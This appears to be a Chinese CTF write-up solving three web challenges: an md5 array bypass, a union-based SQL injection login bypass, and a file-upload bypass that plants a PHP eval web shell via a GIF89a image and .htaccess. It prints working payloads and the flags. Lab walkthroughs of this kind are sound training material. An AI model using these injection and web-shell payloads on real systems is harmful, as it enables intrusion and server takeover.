目录
[MRCTF2020]Ez_bypass1
启动靶机,右键查看源代码
代码审计,GET传两个参数:id 和 gg。POST传passwd。需要满足的条件:1.id和gg值不同,但md5(id)== md(gg); 2.passwd==1234567,但passwd不能纯数字 。
思路: id 和 gg 直接传两个不同数组(md5(数组)== NULL) ,passwd传1234567abc
构造payload
GET: /?id[]=1&gg[]=2
POST: passwd=1234567abc
拿到flag flag{20097f40-8b61-451c-a588-56b65732a9ca}
[GXYCTF2019]BabySQli1
启动靶机,输个弱口令抓个包看看
发现一行注释的一行,复制到base32在线解密
再复制到base64在线解密
估计是提示我们后端的sql语句
select * from user where username = '$name'
知道了username,但是不知道password在后端是怎样查询的。看了下大佬的wp,查询三个字段id,username,password,但我们穿的password有个md5加密,所以构造payload
name=-1' union select 1,'admin',NULL#&pw[]=1
传的pw是数组,md5[数组] = NULL
拿到flag flag{42515684-4641-44ac-81d3-aa348b07fbbf}
[GXYCTF2019]BabyUpload1
启动靶机,熟悉的文件上传,先上传个shell.php看看
看来phtml绕黑名单也不可行了,尝试.pHp ,发现也不行。懒得尝试了,直接传图片马吧。
GIF89a
<script language=php>eval($_POST[1]);</script>
forward放包
由于上传的文件以jpg存储,所以恶意代码无法执行,需要再上传一个.htaccess文件
再访问一下图片马
感觉上传成功了,蚁剑连接
拿到flag flag{bb2bcb49-44e2-4583-bf58-49a20306eedd}